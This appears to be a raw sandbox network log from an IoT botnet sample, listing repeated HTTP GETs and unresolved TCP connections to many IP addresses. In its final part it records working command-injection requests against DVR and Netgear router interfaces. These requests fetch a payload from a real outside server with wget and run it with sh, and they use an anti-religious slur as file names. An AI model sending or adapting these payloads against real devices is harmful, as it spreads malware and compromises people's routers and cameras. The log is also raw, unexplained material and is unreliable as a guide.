Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.107Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.186Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.107Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.107Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.230.63.186Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.218.228.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.4.51Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.4.51Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.4.51Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.4.51Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.4.51Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.4.51Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 141.8.195.73Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.87.198.249Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.208.83.41Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 51.246.24.196
Source: unknown TCP traffic detected without corresponding DNS query: 117.155.88.194
Source: unknown TCP traffic detected without corresponding DNS query: 47.139.34.197
Source: unknown TCP traffic detected without corresponding DNS query: 39.206.80.19
Source: unknown TCP traffic detected without corresponding DNS query: 102.3.200.59
Source: unknown TCP traffic detected without corresponding DNS query: 101.45.191.56
Source: unknown TCP traffic detected without corresponding DNS query: 111.107.72.190
Source: unknown TCP traffic detected without corresponding DNS query: 68.244.223.141
Source: unknown TCP traffic detected without corresponding DNS query: 5.129.81.226
Source: unknown TCP traffic detected without corresponding DNS query: 117.242.49.222
Source: unknown TCP traffic detected without corresponding DNS query: 143.155.161.172
Source: unknown TCP traffic detected without corresponding DNS query: 204.71.78.83
Source: unknown TCP traffic detected without corresponding DNS query: 65.247.190.106
Source: unknown TCP traffic detected without corresponding DNS query: 72.181.220.227
Source: unknown TCP traffic detected without corresponding DNS query: 57.41.113.117
Source: unknown TCP traffic detected without corresponding DNS query: 137.187.80.57
Source: unknown TCP traffic detected without corresponding DNS query: 19.252.174.107
Source: unknown TCP traffic detected without corresponding DNS query: 218.229.126.233
Source: unknown TCP traffic detected without corresponding DNS query: 77.116.152.12
Source: unknown TCP traffic detected without corresponding DNS query: 78.3.57.51
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.37.236
Source: unknown TCP traffic detected without corresponding DNS query: 82.123.63.213
Source: unknown TCP traffic detected without corresponding DNS query: 76.241.189.179
Source: unknown TCP traffic detected without corresponding DNS query: 104.40.52.73
Source: unknown TCP traffic detected without corresponding DNS query: 141.107.175.46
Source: unknown TCP traffic detected without corresponding DNS query: 220.13.14.139
Source: unknown TCP traffic detected without corresponding DNS query: 203.144.173.220
Source: unknown TCP traffic detected without corresponding DNS query: 80.111.242.102
Source: unknown TCP traffic detected without corresponding DNS query: 36.169.143.245
Source: unknown TCP traffic detected without corresponding DNS query: 120.167.96.151
Source: unknown TCP traffic detected without corresponding DNS query: 198.158.201.248
Source: unknown TCP traffic detected without corresponding DNS query: 47.38.245.230
Source: unknown TCP traffic detected without corresponding DNS query: 111.243.65.136
Source: unknown TCP traffic detected without corresponding DNS query: 75.130.147.85
Source: unknown TCP traffic detected without corresponding DNS query: 60.146.215.168
Source: unknown TCP traffic detected without corresponding DNS query: 49.23.145.152
Source: unknown TCP traffic detected without corresponding DNS query: 119.45.178.19
Source: unknown TCP traffic detected without corresponding DNS query: 140.214.75.150
Source: unknown TCP traffic detected without corresponding DNS query: 12.42.74.245
Source: unknown TCP traffic detected without corresponding DNS query: 119.141.156.32
Source: unknown TCP traffic detected without corresponding DNS query: 160.155.143.120
Source: unknown TCP traffic detected without corresponding DNS query: 174.150.221.92
Source: unknown TCP traffic detected without corresponding DNS query: 121.55.107.10
Source: unknown TCP traffic detected without corresponding DNS query: 146.235.104.6
Source: unknown TCP traffic detected without corresponding DNS query: 219.104.125.254
Source: unknown TCP traffic detected without corresponding DNS query: 111.62.157.180
Source: unknown TCP traffic detected without corresponding DNS query: 168.77.167.138
Source: unknown TCP traffic detected without corresponding DNS query: 196.190.152.165
Source: unknown TCP traffic detected without corresponding DNS query: 118.255.249.97
Source: unknown TCP traffic detected without corresponding DNS query: 193.171.248.196
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
